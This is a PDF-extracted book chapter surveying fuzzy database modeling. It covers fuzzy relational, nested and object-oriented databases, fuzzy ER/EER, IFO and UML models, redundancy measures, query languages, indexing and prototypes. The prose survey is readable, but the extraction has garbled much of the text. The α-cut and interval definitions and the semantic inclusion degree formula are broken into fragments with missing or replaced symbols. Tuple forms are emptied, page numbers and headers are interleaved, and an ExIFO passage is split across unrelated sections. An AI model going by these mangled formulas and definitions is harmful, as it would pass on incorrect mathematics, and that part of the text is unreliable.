α-cut: The set of elements whose degrees of membership in F are greater than (greater than or equal to) α, where 0 ≤ α < 1 (0 < α ≤ 1), is called the strong (weak) α-cut of F, respectively denoted by:
It is clear that the α-cut of a fuzzy number corresponds to an interval. Let A and B be the fuzzy numbers of the universe of discourse U and let Aα and Bα be the α-cuts of the fuzzy numbers A and B, respectively, where: Aα = [x1, y1] and Bα = [x2, y2]. Then we have: (A ∪ B) α = Aα ∪ Bα and (A ∩ B) α = Aα ∩ Bα ,
≠ Φ
Aα ∩ B α =
supp (F) = {u| u ∈ U and μF (u) > 0}.
Fα+ = {u| u ∈ U and μF (u) > α} and Fα = {u| u ∈ U and μF (u) ≥ α}.
108
Aα ∪ B α =
⎧⎪Φ, if A ∩ B = Φ ⎨ ⎪⎩[max ( x1, x 2), min ( y 1,
ker (F) = {u| u ∈ U and μF (u) = 1}. •
where ∪ and ∩ denote the union operator and intersection operator between two intervals, respectively. The Aα ∪ Bα and Aα ∩ Bα are defined as follows:
y )], if A 2
∩ B
≠ Φ
Many database researchers have aimed their effort to extend different database models for the purpose of dealing with fuzzy data, and fuzzy database models have appeared as a result. Two major fuzzy logical database models can be found in literature, which are fuzzy relational databases and fuzzy object-oriented databases. In addition, few studies have been done in fuzzy nested relational databases and fuzzy object-relational databases.
Fuzzy Relational Databases Fuzzy information has been extensively investigated in the context of the relational databases. For a comprehensive review of what has been done in the development of the fuzzy relational databases, please refer to Petry (1996); Chen (1999); Yazici and George (1999); Ma (2005a); and Yazici, Buckles, and Petry (1992). The following are some major issues in current studies of fuzzy relational databases.
A Literature Overview of Fuzzy Database Modeling
Representations and Models Several approaches have been taken to incorporate fuzzy data into relational database model. One of the fuzzy relational data models is based on similarity relation (Buckles & Petry, 1982), or proximity relation (Shenoi & Melton, 1989), or resemblance (Rundensteiner, Hawkes, & Bandler, 1989). The other one is based on possibility distribution (Prade & Testemale, 1984; Raju & Majumdar, 1988), which can further be classified into two categories: tuples associated with possibilities and attribute values represented by possibility distributions (Raju & Majumdar, 1988). The form of an n-tuple in each of the abovementioned fuzzy relational models can be expressed, respectively, as: t = , t = and t = , where pi ⊆ Di with Di being the domain of attribute Ai, ai ∈ Di, d ∈ (0, 1], πAi is the possibility distribution of attribute Ai on its domain Di, and πAi (x), x ∈ Di, denotes the possibility that x is the actual value of t [Ai]. Based on the above-mentioned basic fuzzy relational models, there are several extended fuzzy relational database models. It is clear that one can combine two kinds of fuzziness in possibility-based fuzzy relational databases, where attribute values may be possibility distributions and tuples are connected with membership degrees. Such fuzzy relational databases are called possibility-distribution-fuzzy relational models in (Umano & Fukami, 1994). Another possible extension is to combine possibility distribution and similarity (proximity or resemblance) relation, and the extended possibility-based fuzzy relational databases are hereby proposed in (Chen, Vandenbulcke, & Kerre, 1992; Ma, Zhang, & Ma, 2000; Rundensteiner, Hawkes, & Bandler, 1989), where possibility distribution and resemblance relation arise in a relational database simultaneously.
•
Definition. A fuzzy relation r on a relational schema R (A1, A2, ..., An) is a subset of the Cartesian product of Dom (A1) × Dom (A2) × ... × Dom (An), where Dom (Ai) may be a fuzzy subset or even a set of fuzzy subset and there is the resemblance relation on the Dom (Ai). A resemblance relation Res on Dom (Ai) is a mapping: Dom (Ai) × Dom (Ai) → [0, 1] such that: (1) for all x in Dom (Ai), Res (x, x) = 1 (reflexivity) (2) for all x, y in Dom (Ai), Res (x, y) = Res (y, x) (symmetry)
Semantic Measures and Data Redundancies To measure the semantic relationship between fuzzy data, some investigation results for assessing data redundancy can be found in literature. a.
Rundensteiner, Hawkes, and Bandler in 1989 proposed the notion of nearness measure. Two fuzzy data πA and πB were considered α-β redundant if and only if the following inequality equations hold true: min x, y ∈supp (?A) ∪ supp (?B) (Res (x, y)) ≥ α and min z ∈U (1 − |?A (z) − ?B (z)|) ≥ β,
b.
where α and β are the given thresholds, Res (x, y) denotes the resemblance relation on the attribute domain, and supp (πA) denotes the support of πA . It is clear that a twofold condition is applied in their study. For two data πA and πB, Chen, Vandenbulcke and Kerre (1992) define the following approach to assess the possibility and impossibility that πA = πB. E c (πA, πB) (T) = suppx, y ∈U, c (x, y) ≥ α (min (πA (x), πB (y))) and
109
A Literature Overview of Fuzzy Database Modeling
E c (πA, πB) (F) = suppx, y ∈U, c (x, y) < α (min (πA (x), πB (y)))
c.
Here c (x, y) denotes a closeness relation (being the same as the resemblance relation). In Cubero and Vila (1994), the notions of weak resemblance and strong resemblance are proposed for representing the possibility and the necessity that two fuzzy values πA and πB are approximately equal, respectively. Weak resemblance and strong resemblance can be expressed as follows: Π (πA ≈ πB) = suppx, y ∈U (min (Res (x, y), πA (x), πB (y))) and N (πA ≈ πB) = inf x, y ∈U (max (Res (x, y), 1 − πA (x), 1 − πB (y)))
d.
The semantic measures were employed as a basis for a new definition of fuzzy functional dependencies in Cubero and Vila (1994). Bosc and Pivert (1997) give the following function to measure the interchangeability that fuzzy value πA can be replaced with another fuzzy data πB, that is, the possibility that πA is close to πB from the left-hand side: μrepl (πA, πB) = inf x ∈supp (?A) (max (1 − πA (x), μS (πA, πB) (x))), where μS (πA, πB) (x) is defined as: μS (πA, πB) (x) = supy ∈supp (?B) (min (Res (x, y), 1 − |πA (x) − πB (y)|)).
It has been shown that counterintuitive results are produced with the treatment of (a) due to the fact that two criteria are set separately for redundancy evaluation (Chen, Vandenbulcke, & Kerre, 1992; Bosc & Pivert, 1997). Therefore the approaches of (b) and (d) tried to set two
110
criteria together for the redundancy evaluation. But for the approach in (b), there also exist some inconsistencies for assessing the redundancy of fuzzy data represented possibility distribution (Ma, Zhang, & Ma, 1999). The approach in (d) is actually an extension of the approach of (a) and the counterintuitive problem in (a) still exists in the approach in (d), which has been demonstrated in (Ma, Zhang, & Ma, 2000). As to the approach in (c), the weak resemblance, however, appears to be too “optimistic” and strong resemblance is too severe for the semantic assessment of fuzzy data (Bosc & Pivert, 1997). So in Ma, Zhang, and Ma (2000), the notions of semantic inclusion degree and semantic equivalence degree are proposed. For two fuzzy data πA and πB, semantic inclusion degree SID (πA, πB) denotes the degree that πA semantically includes πB and semantic equivalence degree SED (πA, πB) denote the degree that πA and πB are equivalent to each other. Based on possibility distribution and resemblance relation, the definitions of calculating the semantic inclusion degree and the semantic equivalence degree of two fuzzy data are given as follows: SIDα (πA, πB) = n
∑
min
i = 1 u i , u j ∈ U and Res U (u i , u j ) ≥
(
B
i
A
j
/
n
∑
i =1
B
i
and
SEDα (πA, πB) = min (SIDα (πA, πB), SIDα (πB, πA)) The notion of the semantic inclusion (or equivalence) degree of attribute values can be extended to the semantic equivalence degree of tuples. Let ti = and tj = be two tuples in fuzzy relational instance r over schema R (A1, A2, … , An). The semantic inclusion degree of tuples ti and tj is denoted:
A Literature Overview of Fuzzy Database Modeling
SIDα (ti, tj) = min {SIDα (ti [A1], tj [A1]), SIDα (ti [A2], tj [A2]), … , SIDα (ti [An], tj [An])}. The semantic equivalence degree of tuples ti and tj is denoted: SEDα (ti, tj) = min {SEDα (ti [A1], tj [A1]), SEDα (ti [A2], tj [A2]), … , SEDα (ti [An], tj [An])}. Two types of fuzzy data redundancies: inclusion redundancy and equivalence redundancy can be classified and evaluated in fuzzy relational databases. Being different from the classical set theory, the condition A = B is essentially the particular case of fuzzy data equivalence redundancy and the condition A ⊇ B or A ⊆ B is essentially the particular case of fuzzy data inclusion redundancy due to the data fuzziness. Here A and B are fuzzy sets. In general, the threshold should be considered when evaluating the semantic relationship between two fuzzy data. Let πA and πB as well as α be the same as the above. Let β be a threshold. If SIDα (πA, πB) ≥ β, it is said that πB is inclusively redundant to πA. If SEDα (πA, πB) ≥ β, it is said that πA and πB are equivalently redundant to each other. It is clear that equivalence redundancy of fuzzy data is a particular case of inclusion redundancy of fuzzy data. Considering the effect of resemblance relation in evaluation of semantic inclusion degree and equivalence degree, two fuzzy data πA and πB are considered equivalently α-β-redundant if and only if SEDα (πA, πB) ≥ β. If SIDα (πA, πB) ≥ β and SIDα (πB, πA) < β, πB is inclusively α-β-redundant to πA. The processing of fuzzy value redundancy can be extended to that of fuzzy tuple redundancy. In a similar way, fuzzy tuple redundancy can be classified into inclusion redundancy and equivalence redundancy of tuples. Let r be a fuzzy relation on the relational schema R (A1, A2, ..., An). Let t = (πA1, πA2, …, πAn) and t’ = (π’A1, π’A2, …, π’An) be two tuples in r. Let α ∈ [0, 1] and β ∈ [0, 1]
be two thresholds. The tuple t’ is inclusively αβ-redundant to t if and only if min (SIDα (πAi, π’Ai)) ≥ β holds true (1 ≤ i ≤ n). The tuples t and t’ are equivalently α-β-redundant if and only if min (SEDα (πAi, π’Ai)) ≥ β holds (1 ≤ i ≤ n).
Query and Data Processing Classical relational databases suffer from a lack of flexibility in query. The given selection condition and the contents of the relation are all crisp. A query is flexible if the following conditions can be satisfied (Bosc & Pivert, 1992): • •
A qualitative distinction between the selected tuples is allowed. Imprecise conditions inside queries are introduced when the user cannot define his/her needs in a definite way, or when a prespecified number of responses are desired and therefore a margin is allowed to interpret the query.
Here, typically, the former case occurs when the queried relational databases contain incomplete information and the query conditions are crisp and the later case occurs when the query conditions are imprecise even if the queried relational databases do not contain incomplete information. In Zemankova and Kandel (1985), the fuzzy relational data base (FRDB) model architecture and query language are presented and the possible applications of the FRDB in imprecise information processing were discussed. In Kacprzyk, Zadrozny, and Ziokkowski (1987), a “human-consistent” database querying system based on fuzzy logic with linguistic quantifiers is presented. Using clustering techniques, Kamel, Hadfield, and Ismail (1990) present a fuzzy query processing method. Takahashi presents a fuzzy query language for relational databases (Takahashi, 1991) and discusses the theoretical
111
A Literature Overview of Fuzzy Database Modeling
foundation of query languages to fuzzy databases in (Takahashi, 1993). Two fuzzy database query languages are proposed, which are a fuzzy calculus query language and a fuzzy algebra query language. In Bosc and Lietard (1996), the concepts of fuzzy integrals and database flexible querying are presented. In Bosc and Pivert (1995), a relational database language called SQLf for fuzzy querying is presented. Selection, join, and projection operations are extended to cope with fuzzy conditions. Also fuzzy query translation techniques for relational database systems and techniques of fuzzy query processing for fuzzy database systems are presented in (Chen & Jong, 1997) and (Chen & Chen, 2000), respectively. In addition, based on matching strengths of answers in fuzzy relational databases, Chiang, Lin, and Shis (1998) present a method for fuzzy query processing. Yang et al. (2001) focus on nested fuzzy SQL queries in a fuzzy relational database. In addition, fuzzy logic techniques have been used in multimedia database querying (Dubois, Prade, & Sedes, 2001). In addition to query processing in fuzzy relational databases, there are also few studies focusing on the operations of relational algebra in fuzzy relational databases (Umano & Fukami, 1994; Ma & Mili, 2002a). In Zhang and Wang (2000), a type of fuzzy equi-join is defined using fuzzy equality indicators.
Data Dependencies and Normalizations Integrity constraints play a critical role in a logical database design. Among these constraints, data dependencies are of more interest. Based on various fuzzy relational database models, some attempts have been taken to express the data dependencies, mainly including fuzzy functional dependency (FFD) and fuzzy multivalued dependency (FMVD). There are some papers that focus on FFD, where we can classify two kinds of papers: the first one has a focus on the axiomatization of FFD
112
(Chen, Kerre, & Vandenbulcke, 1994; Cubero & Vila, 1994; Chen, Kerre, & Vandenbulcke, 1995; Saxena & Tyagi, 1995; Liao, Wang, & Liu, 1999; Liu, 1992, 1993a, 1993b) and the second has a focus on the lossless join and decomposition (Raju & Majumdar, 1988; Bhuniya & Niyogi, 1993; Bosc & Pivert, 2003). The later is the basis to implement the normalization of fuzzy relational databases (Chen, Kerre, & Vandenbulcke, 1996). Also there are some papers that focus on FMVD (Tripathy & Sakena, 1990; Jyothi & Babu, 1997; Bhattacharjee & Mazumdar, 1998). Finally some papers focus both on FFD and FMVD and present the axiomatization of FFD and FMVD (Liu, 1997; Yazici & Sozat, 1998; Sözat & Yazici, 2001; Ma, Zhang, Ma, & Mili, 2002). To solve the problems of update anomalies and data redundancies that may exist in the fuzzy relational databases, the normalization theory of the classical relational database model must be extended so as to provide theoretical guideline for fuzzy relational database design. Based on the notion of fuzzy functional dependency, some notions such as relation keys and normal forms are generalized in Chen, Kerre, and Vandenbulcke (1996). As a result, q-keys, fuzzy first normal form (F1NF), q-fuzzy second normal form (qF2NF), q-fuzzy third normal form (q-F3NF), and q-fuzzy boyce-codd normal form (q-FBCNF) are formulated. Also dependency-preserving and lossless join decompositions into q-F3NFs are discussed. Within the framework of the similarity-based fuzzy data representation, in Bahar and Yazici (2004), similarity, conformance of tuples, the concept of fuzzy functional dependencies, and partial fuzzy functional dependencies are discussed. On the basis, the fuzzy key notion, transitive closures, and the fuzzy normal forms are defined for similarity-based fuzzy relational databases and the algorithms for dependency preserving and lossless join decompositions of fuzzy relations are given. Also it is shown how normalization, dependency preserving, and lossless join decomposition based on the fuzzy
A Literature Overview of Fuzzy Database Modeling
functional dependencies of fuzzy relation are done and applied to some real-life applications. By employing equivalence classes from domain partitions, the functional dependencies and normal forms for the fuzzy relational model are defined in Shenoi and Melton (1992) and then the associated normalization issues are discussed. It should be noticed that the fuzzy data dependencies can be applied in data handling. In Bosc, Dubois, and Prade (1998), FFD is used for redundancy elimination. In Intan and Mukaidono (2000), FFD is used for approximate data querying. In Chang and Chen (1998); Liao, Wang, and Liu (1999); Ma, Zhang, and Mili (2002), FFD is used for fuzzy data compression.
Fuzzy Nested Relational Databases In Yazici, Buckles, and Petry (1999), an extended nested relational data model (also known as an NF2 data model) is introduced for representing and manipulating complex and uncertain data in databases and the extended algebra and the extended SQL-like query language are hereby defined. Also physical data representation of the model and the core operations that the model provides are also introduced. In Ma and Mili (2002b), based possibility distribution rather than the similarity relations in Yazici, Buckles, and Petry (1999), an extended possibility-based fuzzy nested relational database model is introduced and its algebra is hereby developed. It should be pointed out that NF2 data model is able to handle complex-valued attributes and may be better suited to some complex applications such as office automation systems, information retrieval systems and expert database systems. But it is difficult for NF2 data model to represent complex relationships among objects and attributes. Some advanced abstracts in data modeling (e.g., class hierarchy, inheritance, superclass/subclass, and encapsulation) are not supported by NF2 data model, which are needed by many real applications. Therefore, in order to model uncertain data
and complex-valued attributes as well as complex relationships among objects, current efforts have being focused on conceptual data models and object-oriented databases (OODB) with imprecise and uncertain information.
Fuzzy Object-Oriented Databases The incorporation of imprecise and uncertain information in object-oriented databases has increasingly received the attentions, where fuzziness is witnessed at the levels of object instances and class hierarchies. Umano, Imada, Hatono, and Tamura (1998) define a fuzzy object-oriented database model that uses fuzzy attribute values with a certain factor and an SQL type data manipulation language. An uncertainty and fuzziness in an object-oriented (UFO) databases model is proposed in van Gyseghem and de Caluwe (1998) to model fuzziness and uncertainty by means of conjunctive fuzzy sets and generalized fuzzy sets, respectively. That the behavior and structure of the object are incompletely defined results in a gradual nature for the instantiation of an object. The partial inheritance, conditional inheritance, and multiple inheritances are permitted in fuzzy hierarchies. Based on two different strategies, fuzzy types are added into fuzzy object-oriented databases to manage vague structures in Marín, Vila, and Pons (2000); Marín, Pons, and Vila (2001). And it is also presented how the typical classes of an OODB can be used to represent a fuzzy type and how the mechanisms of instantiation and inheritance can be modeled using this kind of new type on an OODB. In Marín, Medina, Pons, Sánchez, and Vila (2003), complex object comparison in a fuzzy context is developed. In Cross (2001, 2003), fuzzy relationships in object models were investigated. Based on the extension of a graphs-based model object model, a fuzzy object-oriented data model is defined in Bordogna, Pasi, and Lucarella (1999). The notion of strength expressed by linguistic qualifiers was proposed, which can be
113
A Literature Overview of Fuzzy Database Modeling
associated with the instance relationship as well as an object with a class. Fuzzy classes and fuzzy class hierarchies are thus modeled in the OODB. The definition of graph-based operations to select and browse such a fuzzy object oriented database that manages both crisp and fuzzy information is proposed in Bordogna and Pasi (2001). Based on similarity relationship, in George, Srikanth, Petry, and Buckles (1996), the range of attribute values is used to represent the set of allowed values for an attribute of a given class. Depending on the inclusion of the actual attribute values of the given object into the range of the attributes for the class, the membership degrees of an object to a class can be calculated. The weak and strong class hierarchies were defined based on monotone increase or decrease of the membership of a subclass in its superclass. Based on possibility theory, vagueness and uncertainty are represented in class hierarchies in Dubois, Prade, and Rossazza (1991), where the fuzzy ranges of the subclass attributes defined restrictions on that of the superclass attributes and then the degree of inclusion of a subclass in the superclass was dependent on the inclusion between the fuzzy ranges of their attributes. Also based possibility distribution theory, in Ma, Zhang, and Ma (2004), some major notions in object-oriented databases such as objects, classes, objects — classes relationships, subclass/superclass, and multiple inheritances are extended under fuzzy information environment. A generic model for fuzzy object-oriented databases and some operations are hereby developed. Some efforts have been paid on the establishment of consistent framework for a fuzzy object-oriented model based on the standard for the Object Data Management Group (ODMG) object data model (Cross, Caluwe, & van Gyseghem, 1997). In de Tré and de Caluwe (2003), an object-oriented database modeling technique is presented based on the concept “level-2 fuzzy set” to deals with a uniform and advantageous representation of both perfect and imperfect
114
“real world” information. Also it was illustrated and discussed how the ODMG data model can be generalized to handle “real world” data in a more advantageous way. In Ndouse (1997), a fuzzy intelligent architecture based on the uncertain object-oriented data model, which is initially introduced by Dubois, Prade, and Rossazza (1991), is proposed. The classes include fuzzy IF-THEN rules to define knowledge and the possibility theory is used for representations of vagueness and uncertainty. In Lee, Xue, Hsu, and Yang (1999), an approach to OO modeling based on fuzzy logic is proposed to formulate imprecise requirements along four dimensions: fuzzy class, fuzzy rules, fuzzy class relationships, and fuzzy associations between classes. The fuzzy rules, in other words, the rules with linguistic terms are used to describe the relationships between attributes. Some special fuzzy object-oriented databases, for example, fuzzy deductive object-oriented databases (Yazici & Koyuncu, 1997; Koyuncu & Yazici, 2003; Koyuncu and Yazici, 2003), fuzzy and probabilistic object bases (Cao & Rossiter, 2003), and so forth, have been developed. In addition, fuzzy object-oriented database have been applied in some areas such as geographical information systems (Cross & Firat, 2000) and multimedia (Candan & Li, 2001; Majumdar, Bhattacharya, & Saha, 2002). Concerning most recent research and application issues about fuzzy object-oriented databases, ones can refer to (Ma, 2004a).
Fuzzy Object-Relational Databases Object-relational database systems allow database designers to take advantage of both the powerful object-oriented modeling capability and the robustness of the relational data model. Compared with the fuzzy relational databases and the fuzzy object-oriented databases, few studies have been done in fuzzy object-relational databases. Combining object-relational features
A Literature Overview of Fuzzy Database Modeling
and fuzzy theory, Cubero et al. (2004) develop a fuzzy object-relational database framework to permit the representation of complex imperfect information based on fuzzy relational and objectoriented databases.
•
• •
FUZZY CONCEPTUAL DATA MODELS Conceptual (semantic) data models for conceptual data modeling provide the designers with powerful mechanisms in generating the most complete specification from the real world. The conceptual data models, in other words, ER/EER and UML, represent both complex structures of entities and complex relationships among entities as well as their attributes. So the conceptual data models play an important role in conceptual data modeling and database conceptual design. In order to deal with complex objects and imprecise and uncertain information in conceptual data modeling, one needs fuzzy extension to conceptual data models, which allow imprecise and uncertain information to be represented and manipulated at a conceptual level. While fuzzy databases have been extensively studied in last two decades in the context of the relational database model and current efforts have been concentrated on the fuzzy object-oriented databases, less research has been done in the fuzzy conceptual data modeling.
Fuzzy ER/EER Models The fuzzy set theory was first applied to some of the basic ER concepts in Zvieli and Chen (1986). Fuzzy entity sets, fuzzy relationship sets and fuzzy attribute sets were introduced in addition to fuzziness in entity and relationship occurrences and in attribute values. Consequently, fuzzy extension to the ER algebra (Chen, 1976) has been sketched. The three levels of fuzziness in the ER model can be found.
At the first level, entity sets, relationships and attributes may be fuzzy. In other words, they may have a membership degree to the ER model. The second level is related to the fuzzy occurrences of entities and relationships. The third level concerns the fuzzy values of attributes of special entities and relationships.
Formally, let E, R, and A be the fuzzy entity type set, fuzzy relationship type set, and fuzzy attribute set of the fuzzy ER model, respectively, and μE, μR, and μA be their membership functions. Then: •
•
•
for an entity type, say Ei, we have μE (Ei)/Ei, where μE (Ei) is the degree of Ei belonging to E and 0 ≤ μE (Ei) ≤ 1, for a relationship type, say Ri, we have μR (Ri)/Ri, where μR (Ri) is the degree of Ri belonging to R and 0 ≤ μR (Ri) ≤ 1, and for an attribute of entity type or relationship type, say Ai, we have μA (Ai)/Ai, where μA (Ai) is the degree of Ai belonging to A and 0 ≤ μA (Ai) ≤ 1.
Other efforts to extend the ER model can be found in Ruspini (1986; Vandenberghe (1991); and Vert, Morris, Stock, and Jankowski (2000). In Ruspini (1986), an extension of the ER model with fuzzy values in the attributes was proposed and a truth value can be associated with each relationship instance. In addition, some special relationships such as same-object and subset-of, member-of were also introduced. Vandenberghe (1991) applied Zadeh’s extension principle to calculate the truth value of propositions. For each proposition, a possibility distribution was defined on the doubleton true, false of the classical truth values. The proposal of Vert, Morris, Stock, and Jankowski (2000) was based on the notation used by Oracle and used the fuzzy sets theory to treat data sets as a collection of fuzzy objects, applying
115
A Literature Overview of Fuzzy Database Modeling
the result to the area of geospatial information systems (GISs). Without including graphical representations, the fuzzy extensions of several major EER concepts, including superclass/subclass, generalization/specialization, category and the subclass with multiple superclasses, were introduced in Chen and Kerre (1998). More recently, Galindo et al. (2004) extended the EER models by relaxing some constraints with fuzzy quantifiers.
but is not expressed precisely. For each of these attribute types, there is a formal definition and graphical representation. In addition, a high-level primitives is introduced to model fuzzy entity type whose semantics are related to each other with logic operators OR, XOR, or AND. Using possibility theory, the IFO model is extended to the IF2O (fuzzy IFO) model to represent fuzziness at the levels of the attribute, the object, and class in (Ma, 2005; Ma & Shen, 2006).
Fuzzy IFO Model
Fuzzy UML Model
In addition to the ER/EER model, IFO data model (Abiteboul & Hull, 1987) is a mathematically defined conceptual data model that incorporates the fundamental principles of semantic database modeling within a graph-based representational framework. The extensions of IFO to deal with fuzzy information were proposed in Vila, Cubero, Medina, and Pons (1996); Yazici, Buckles, and Petry (1999). In Vila et al. (1996), several types of imprecision and uncertainty such as the values without semantic representation, the values with semantic representation and disjunctive meaning, the values with semantic representation and conjunctive meaning, and the representation of uncertain information were incorporated into the attribute domain of the object-based data model. In addition to the attribute-level uncertainty, the uncertainty was also considered to be at the object and class level. Based on similarity relations (Buckles & Petry, 1982), the IFO model is extended to the ExIFO (extended IFO) model to represent uncertainties at the levels of the attribute, the object, and class in (Yazici, Buckles, and Petry, 1999). Three kinds of attributes are used, which are fuzzyvalued attributes, incomplete-valued attributes and null-valued attributes and three cases are distinguished: in the first case, the true data value may belong to a specific set or subset of values; in the second case, the true data value is not known; in the third case, the true data value is available
UML provides a collection of models to capture the many aspects of a software system (Booch, Rumbaugh, & Jacobson, 1998). Notice that while the UML reflects some of the best OO modeling experiences available, it suffers from some lacks of necessary semantics. One of the lacks can be generalized as the need to handle imprecise and uncertain information although such information exist in knowledge engineering and databases and have extensively being studied (Parsons, 1996). In Sicilia, Garcia, and Gutierrez (2002); Sicilia, Garcia, Diaz, and Aedo (2002), a practical approach and implementation for a fuzzy-UML storage version is described. With including graphical representations, the fuzzy extension of several major UML concepts (class, generalization, aggregation, association, and dependency) is introduced in Ma (2004b).
116
DESIGN AND IMPLEMENTATION OF FUZZY DATABASES The need for handling imprecision and uncertainty in database management systems (DBMSs) has already been recognized earlier and a lot of important work has been done on the fuzzy logical database models. However, in order to gain acceptance in practice, these fuzzy logical database models should be implemented in actual DBMSs where they could prove their superior performance.
A Literature Overview of Fuzzy Database Modeling
Conceptual Design of Fuzzy Databases Traditional databases are generally designed from conceptual data models. By mapping, conceptual data models are converted into database models. It is shown above that less research has been done in modeling fuzzy information in the conceptual data model. It is particularly true in developing design methodologies for implementing fuzzy databases.
Conceptual Design of Fuzzy Relational Databases Chaudhry, Moyne, and Rundensteiner (1999) propose a method for designing fuzzy relational databases (FRDBs) following the extension of the ER model of Zvieli and Chen (1986), taking special interest in converting crisp databases into fuzzy ones. Their ER model includes fuzzy relationships as relationships with at least one attribute, namely, the membership grade. They propose FERM, a design methodology for mapping a fuzzy ER data model to a crisp relational database in four steps: constructing a fuzzy ER data model, transforming it into relational tables, normalization and ensuring a correct interpretation of the fuzzy relational operators. The IFO model introduced in Abiteboul and Hull (1987) is extended into the fuzzy IFO model based on fuzzy set and possibility distribution theory in (Ma, 2005b). An approach to mapping a fuzzy IFO model to a fuzzy relational database schema is described.
Conceptual Design of Fuzzy Nested Relational Databases The ExIFO (extended IFO) model proposed in Yazici, Buckles, and Petry (1999) is an extended version of the IFO model introduced in Abiteboul and Hull (1987), which can represent uncertainties at the levels of the attribute, the object, and
class. Using the ExIFO model as the semantic data model to represent the database universe at conceptual design level, in Yazici, Buckles, and Petry (1999), a mapping process to transform the ExIFO model into the fuzzy extended NF2 relations including uncertain properties that are represented in both the ExIFO model and the NF2 database model is described.
Conceptual Design of Fuzzy Object-Oriented Databases Ma, Zhang, Ma, and Chen (2001) work with the three levels of Zvieli and Chen (1986) and they introduce a fuzzy extended entity-relationship (FEER) model to cope with imperfect as well as complex objects in the real world at a conceptual level. They provided an approach to mapping a FEER model to a fuzzy object-oriented database schema. Ma and Shen (2006) present a conceptual and logical data model, namely, the IF2O model and the fuzzy object-oriented database model. A formal approach to mapping a fuzzy IFO (IF2O) model to a fuzzy object-oriented database schema is developed.
Index of Fuzzy Databases High performance is a necessary precondition for the acceptance of the fuzzy databases by end users. One important step in improving the efficiency of a database system is the introduction of powerful index structures. It should be noticed, however, that performance issues have been quite neglected in research on fuzzy DBMS so far. Indexing in fuzzy databases has not received much attention yet and publications on indexing in fuzzy databases are few. Boss and Helmer (1999) propose index structures for fuzzy DBMS based on well-known techniques of superimposed coding together with detailed cost models. In Helmer (2003), several techniques for indexing fuzzy set in databases are proposed to improve the query evaluation performance. The presented access
117
A Literature Overview of Fuzzy Database Modeling
methods are based on superimposed coding or rely on inverted files. Although there are many indexing techniques for object-oriented data models, there are only a few indexing techniques for fuzzy object-oriented databases. The access structure proposed in Bosc and Pivert (1992a) uses one index per fuzzy predicate tied to an attribute. The objective is to associate each grade of a fuzzy predicate with the list of tuples that satisfy that predicate. This method only deals with homogeneous domains and assumes that the underlying relations are crisp. Another study included in Yazici and Cibiceli (1999) introduces a fuzzy access structure along with a record and a file organization schema for fuzzy relational databases. In this access structure, MLGF structure is extended to index both the crisp and fuzzy attribute values together. In Yazici, Ince, and Koyuncu, (2004), a multi-dimensional indexing technique (the FOOD Index) is proposed to deal with different kinds of fuzziness in similarity-based fuzzy objectoriented databases. It is shown how the FOOD Index supports various types of flexible queries and evaluates performance results of crisp, range, and fuzzy queries using the FOOD index. A comprehensive overview of indexing techniques suitable for fuzzy object-oriented databases is given in Helmer (2004). Four typical query patterns used in fuzzy object-oriented databases are identified, which are single-valued, set-valued, navigational, and type hierarch access. For each query pattern index structure are presented that support the efficient evaluation of these queries, ranging from standard index structures (like Btree) to very sophisticated access methods (like Join Index Hierarchies).
Prototype of Fuzzy Databases The problem of the implementation of a fuzzy relational database management system (FRDBMS) has been treated in the literature basically
118
following two basic lines (Medina, Vila, Cubero, & Pons, 1995): •
•
Starting from a RDBMS with precise information, to develop a syntax that allows formulate imprecise queries. To build a FRDBMS prototype which implements a concrete fuzzy relational database model.
The proposal in Medina, Vila, Cubero and Pons (1995) is inside the first line, but including the capability of representing and handling fuzzy information in a classical RDBMS. Introducing some criteria for representation and handling of imprecise information, they show a series of mechanisms to implement imprecise information in a classical RDBMS. To design programming interfaces, Sicilia, Garcia, Diaz, and Aedo (2002) describe a software framework called fJDBC that extends the Java Database Connectivity API by enabling fuzzy queries on existing relational databases, using externally-stored metadata. Design and implementation issues in the similarity-based fuzzy object-oriented databases are presented in Yazici, George, and Aksoy (1998). A software architecture for the implementation of the model is described and the details of prototype implemented using the EXODUS storage manager (ESM) are discussed. Also Berzal, Marin, Pons, and Vila (2004) propose a framework and an architecture which can be used to develop fuzzy object-oriented capabilities using the conventional features of the object-oriented data paradigm. Sicilia, Barriocanal, and Gutierrez (2004) try to provide some criteria to select the fuzzy extensions that more seamlessly integrate in the current object storage paradigm known as orthogonal persistence, in which programminglanguage object models are directly stored, so that database design becomes mainly a matter of object design.
A Literature Overview of Fuzzy Database Modeling
CONCLUSION
REFERENCES
Incorporation of fuzzy information in database model has been an important topic of database research because such information extensively exists in data and knowledge intensive applications such as natural language processing, artificial intelligence, and CAD/CAM, among others, where fuzzy data play an import role in nature. Therefore, research has been conducted into various approaches to represent and deal with fuzzy data. Some of these techniques, developed at a conceptual level, describe the meaning associated with fuzzy data in a database, which are called fuzzy conceptual data modeling, and others, developed at a logical level, concentrate on processing the fuzzy data, which are called fuzzy logical database modeling. This chapter elaborates on the issue of fuzziness management in the conceptual data models and the logical database models. Three different approaches to the conceptual data modeling are examined, which are the fuzzy ER/EER model, the fuzzy IFO model, and the fuzzy UML model. These models can represent complex objects with fuzziness in the attribute values and even objects with their powerful abstraction mechanism. In the logical database models, the fuzzy relational databases, the fuzzy nested relational databases, the fuzzy object-oriented databases, and the fuzzy object-relational databases are discussed, respectively. The fuzzy relational database model has been the subject of more thorough data presentation and models, query and data processing, and data dependencies and formalization. Finally the question of designing and implementing the fuzzy databases is considered.
Abiteboul, S. & Hull, R. (1987). IFO: A formal semantic database model. ACM Transactions on Database Systems, 12(4), 525-565.
ACKNOWLEDGMENT Work is supported by the Program for New Century Excellent Talents in University (NCET-050288) and the MOE Funds for Doctoral Programs (20050145024).
